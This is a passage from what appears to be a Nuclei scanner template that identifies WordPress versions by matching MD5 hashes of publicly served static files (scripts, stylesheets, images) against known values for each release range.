"(\"f7e77d350b7cf67c70c6e43c0686ac12\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"f42702f4ffb78b7e477e0f10f6d49e9c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-selective-refresh.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"f6d9c5afa874858948a15bb7567ed172\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.19 - dsl: - - "(\"0aa9f21b635906c5318b64c3aedbb8fe\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"82eba93b7a9b05a56acfded2d3ce65e5\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"68c83cd50c29e7924959c18b4ee5cc84\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"4283cafe0808f3ffec6f73ffb06606e4\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"119b9a27369eaef7e59ef6424d4cdf52\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"94ba6c46025a2bf27bc2a00fcc084394\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.0.11 - dsl: - - "(\"527d1e0957b88a45d872f4a318e8ec13\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"d5e80910e6bcb047f36fa770e5af9b7a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"7f248c87891b1c02b1d2fd791e67cfb7\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"be7550e5b289eb30781afc91b6e2e314\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"9ddd4d762d805b2c5ea458515cc5e217\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"cf85d75e70304c42f77553ee9b9ec585\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.1.32 - dsl: - - "(\"fc6243e6ea74f2ca62bffb849de3657f\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"8b7746f89178fcba2f84b7f4dd295571\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"117fe2f7bd8e78b992eb115a95107c62\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"d22ba8b7c26828ae98c4f152804bde39\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"cd257239f5da18126d80cef91c920c36\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"04602e573c17983fa825c1cdcdd368cb\" == md5(body))" - - type: dsl - name: 3.1 - 3.3.3 - dsl: - - "(\"1e1ff96cf9f43d17873d7fd6eaf2adf2\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"850df1d822d0e22ef2c3ebd3cf19b99e\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"cdb50c9c1f1d6c177cc146dd1669d255\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"f5f319c12c4a5494df30c1d326465a6b\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"d9bf61cf4192c0a437323ef3bd70132d\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"a3f5caf5986947eb51f0f3770770ff63\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9f2e447602026b88cfc72ada19933004\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"440c1456719a7ea03648adcfbf3b59b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-widgets.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"4b21921e3e0ff0e78d677fe9286923d3\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"b8300b64a85bea2d8bb7ba4c8ac810be\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"42607f91d7bb0160a1f7635b2b36c67c\" == md5(body))" - - type: dsl - name: 5.1 - 5.3 - dsl: - - "(\"4cacc9c3fcc9b6e7a9bd5802357e3d7f\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"8b85ef7b2e2dc7be48e62ef794142ffc\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"01c5d623834a0c9561e54063a8cdebb5\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"06c56794790f5de1745b1215223eaf0b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-ajax-response.js" - matchers: - - type: dsl - name: 4.7 - 4.9.4 - dsl: - - "(\"c404d2ebab29a76e5a4eef0a23c3eb10\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"782715051d87f0cf1f869f5b2358db2b\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.4.24 - dsl: - - "(\"4eee92d2ee86812037ed3afbcab3bf9a\" == md5(body))" - - type: dsl - name: 4.2 - 4.3 - dsl: - - "(\"cf231fd7fd235076995cd3ea70c31f92\" == md5(body))" - - type: dsl - name: 3.8 - 4.1.32 - dsl: - - "(\"316dc6a88af5010df7bee09c481950e8\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"54b536447cd644bcafa51a568be8c54e\" == md5(body))" - - type: dsl - name: 2.9 - 3.4.2 - dsl: - - "(\"1da637535cdded009a8dde077e234430\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"18554862b00befc3db669e3c4af0f568\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"0289d1c13821599764774d55516ab81a\" == md5(body))" - - type: dsl - name: 2.5 - 2.7 - dsl: - - "(\"e4e96312e1bb476fc634ae4fcebde13b\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.0.11 - dsl: - - "(\"4134afac564acdd0f18f6cd705ee7759\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"f1eb3b28419b46bc4d93f760e543167d\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"30afc4c6904a1bb43ca590182fa82c99\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"8cefea482bbe5aecc797bd1201182c91\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/w-logo-blue.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"fd5b4eb05706a2f05f707fe077ae1030\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"4990a6a10bcbccdbbaa0a7103f065344\" == md5(body))" - - type: dsl - name: 5.4.1 - dsl: - - "(\"000bf649cc8f6bf27cfb04d1bcdcd3c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/loading.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"2d5b92b61674c850bff00cecaf0864ec\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"fb72313c9cd2f6f42123ef9213837924\" == md5(body))" - - type: dsl - name: 2.6 - 3.8.35 - dsl: - - "(\"9a8269421303631316be4ab5e34870e1\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"a20488e97ed28a25eb847938a297ffb4\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"6917a796d74c08a8c0b993e2acd68985\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.2.9 - dsl: - - "(\"876d276e7d54dd2d568de865c3e0f60a\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"4085d79caf783e639794adbab5d6c2a2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/sort-2x.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"186e51267fca5d20b230c72d9a8983ee\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"3109e5b77fb7f442c17fb0a10715a657\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.8.35 - dsl: - - "(\"e07d0440c2d59e252b64f10bd293f897\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"45592749900dae6565848a310a0c0fbd\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"8f91b441c3ac6bec3abc62d18276466a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"f59fa2d103e13985d7e18df4c9d06c85\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"00f8eb37d4873aff33559be1ab3a5da0\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"b03476d23e09e01f7be81edcb0327fce\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"b386228e88380ff75bcf293d432db6a4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"94d8926ae846f335cf811cbf61635298\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"1be4557714895c25adba8260adcc05ab\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"55e763de4264920be68a1f998fccc720\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"0f784f57881b720d887823b519fa143f\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"fa1ab1ee7f929d54403190cb29e496fe\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"b84abcd93646dedd34ab5c0fe7ffd284\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"6a350c561385084ca1b185cd812e7f43\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"d4252f4e714f52e5670c05fbc02b5ced\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/customize-preview.min.css" - matchers: - - type: dsl - name: 4.7.1 - 4.8.15 - dsl: - - "(\"69bfc88e3f3d46f116da818588e1c958\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"f97c81542e5a01d1d1fafc83d3e919e4\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"76bf4def75558cdf6dcfc19e594b77a6\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"531c56155495680f35003643b5cfaa48\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"8774579bd6b94878424d338bb07b743d\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"82273ee41dee175c7defaaadad83da06\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"7a6724d220d95c58e9cad4439440e987\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/customize-preview-rtl.min.css" - matchers: - - type: dsl - name: 4.7.1 - 4.8.15 - dsl: - - "(\"cccb91a79bd1a1b14bdad769d3b04ff2\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"c48fdf5861c04e2024cfdd46da5955ee\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"f2c05a610b3d909c6aa8d4babd48537b\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"26b12a98fb6b6e4b9791e35fa9df232b\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"9d5d67784b768a01eb2b9dd0ad92df39\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/customize-preview.css" - matchers: - - type: dsl - name: 4.7.1 - 4.8.15 - dsl: - - "(\"a5a052c8869b9f302405b069b1aa0613\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"f77ee2e90b397bdc85b94fef4ec3c339\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"0ab30f10403b04fae67be3820704c05f\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"ff2b06049dc65d95cd7f18988e6e7dd1\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"98c2c3a588daf7cde40f226ac67f2ddb\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"27b10ba4bbd6ab877d3aefa45d9bb779\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"5fdb191ad80e4816383046e16098b1f1\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"90dc80956cdac4efdc00e1fa2f1fd826\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"4c4992759e2e9171987ee83c2b4ff8f6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"69119370ea789693d6c810f34364c99c\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"f70177af61c65044aaa0a18594338f3c\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"ba1ad4bc43e2aa43661307a5599b48c5\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"ae6578b0e82b02df40c157015c7d3683\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"40c7819542c846fc69a480e2bb87f722\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"7399d7a8a9a716303de9628083a61070\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"d47998057f5f31758add87f462076fe2\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"a7a67d1de1a0330fc7769d384a6564cc\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"ecfba7b663d82c1fbecfbcc86db4a649\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.2 - dsl: - - "(\"0e31542957a5ced3fb021a641359a902\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.6 - dsl: - - "(\"d2923af1854be05bcf49775c89aa6798\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"70b1fc34e77c76bb92be0c02b229b467\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"ae983b9a7a8d0ad43cad5ef5ad85c1ab\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"0076bd51c8efaca78a6455c512e8be05\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"8808a137a054725f8fc730e4bbb58b89\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"38740af5358c42ca3770804aca9b1e2d\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"ed15397c76c49fb9518bdb1b912a55ef\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b778c332bab095f15db744c1795a430e\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"5f222b295e30dd62dfe160985b95f495\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"fc97c80e6a890c6b30837a2b7ccea115\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"a17103ce4c70991f0751a1df272eac49\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"2a32942db87ad5f97fd3cfe5b3317609\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.6 - dsl: - - "(\"591f9bbbaefec332c4b00d6d7d25a1c0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/wp-small.png" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"ac8d6980faf95aa199492d5f3abdfa82\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/wordpress.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"9d2220fca1ac66355fb7ca7916d5a2e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/url.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"44eea3b2c6b0e045292ddaa8b828b3a6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/bgbookmarklet1.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"3a09dfc3d0fe15f0690bfccb8e85830e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/bgbookmarklet.png" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"f0e41f1bed9a4c21d1dc545e5d3c158a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/bgbookmarklet3.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"686f31ec275bfa7652a4f290e9a77307\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/email.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"e53e211ef830dd087508e4967613d8cf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/xml.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"e67c90a18c89f8d05125c045b2978dcf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/wpminilogo.png" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"2f58b9a016e6da1012819decfc6dd331\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_question.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_neutral.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_sad.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_biggrin.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_surprised.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_wink.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_cool.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_confused.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_redface.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_cry.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_smile.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_evil.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_mrgreen.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_idea.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_razz.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_lol.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_rolleyes.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_exclaim.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_mad.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_twisted.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_arrow.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/smilies/icon_eek.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-img/blank.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"6d22e4f2d2057c6e8d6fab098e76e80f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-2.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"de5cf34823da2cfed273b9c8cf52248a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/star.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"888920359f8931eb72582d0c352722ff\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-3.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"a5b70a894f90cf8574284b7296f7661c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-9.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"4eda31d251821e5d6e5ed9cad411434f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-0.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"745de19d2c08e95dfa07113d16d77ace\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-6.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"7320c171d53bc359b0cd7ae1b53774d8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-7.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"a8cbf1fe3a498f4a20abd6768a46de7c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-8.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"c5cb7ee14792e1658bc0663014d37f65\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-4.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"aa064cadd0f43c0352607dad68bc5af2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-1.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"bdc9ea72a16082ff4d0ac730f090e0d7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-links/links-images/rating-5.gif" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"42698681e4d8734c2932c2415b94b713\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-include/xmlrpcs.inc" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"0d59ddac24244f58002965f254602d32\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/b2-include/xmlrpc.inc" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"14524c5d7f9f72394e04512d9941bc50\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/layout2b.css" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"baec6b6ccbf71d8dced9f1bf67c751e1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/readme.txt" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"d6a0bc72fe7314bf9e5a823476464f35\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/b2quicktags.js" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"e7df5ea2abd8e8ff1cdc33c890f8b158\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/b2menutop.txt" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"75c44385f76be11e237f16e6197cf5f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/b2.css" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"3c14414953b50843020e9ffdab7d8f9b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/example.htaccess" - matchers: - - type: dsl - name: 0.71-gold - dsl: - - "(\"194e5ef5e9fcfffb5ad172c3c6338ce4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/print.css" - matchers: - - type: dsl - name: 0.71-gold - 1.2.2 - dsl: - - "(\"31303216dd399348d4fe45e4f775e761\" == md5(body))" - - type: dsl - name: 1.2.1 - dsl: - - "(\"fabceb537401cb07c705e7a7203f3cf6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/widgets-rtl.css" - matchers: - - type: dsl - name: 2.2.3 - dsl: - - "(\"616cfd535e185eab0a2e2035d2367d70\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.2 - dsl: - - "(\"6870131d25b60c372f372e0eb1f46a4f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/install-rtl.css" - matchers: - - type: dsl - name: 2.2.3 - dsl: - - "(\"77b94469c0536617ccf3f128e82629e7\" == md5(body))" - - type: dsl - name: 2.1 - 2.2.2 - dsl: - - "(\"8cbe81cffd55d03cbeccf0fe7afea257\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/widgets.css" - matchers: - - type: dsl - name: 2.2.1 - 2.2.3 - dsl: - - "(\"d751fab844dac51f11dfcde4bcd951fe\" == md5(body))" - - type: dsl - name: 2.2 - dsl: - - "(\"2ab4e0bc7e978c7eecaf6d54867370a8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-ajax.js" - matchers: - - type: dsl - name: 2.2.1 - 2.5.1 - dsl: - - "(\"c65fa296a21bab7aaac66f145ac45155\" == md5(body))" - - type: dsl - name: 2.2 - dsl: - - "(\"c5dbce0c3232c477033e0ce486c62755\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-ie-rtl.css" - matchers: - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"0270238fcfc6b6195b11227c1671b8e0\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"8a06d53fca440005e815e5654b152700\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/forms.js" - matchers: - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"06f1e99c547915248f28eb8e0a59a316\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"5248ccc0d3a9bcdd0dc8b2faf129db2d\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"cebab0a1616272ef63c4e98ae005a3f8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/wp-admin.dev.css" - matchers: - - type: dsl - name: 2.9.1 - 2.9.2 - dsl: - - "(\"59f4b6b1fe9d9d775f531772284fedda\" == md5(body))" - - type: dsl - name: 2.9 - dsl: - - "(\"59bd3e53cbab943706702e18622f517d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/wp-gears.js" - matchers: - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"0f72be7cae8c998be51a21216abca01d\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"596473e965c68ad64c8c20b5c56e0da3\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"1335ebf3c647fb07e0b9e427e83ed435\" == 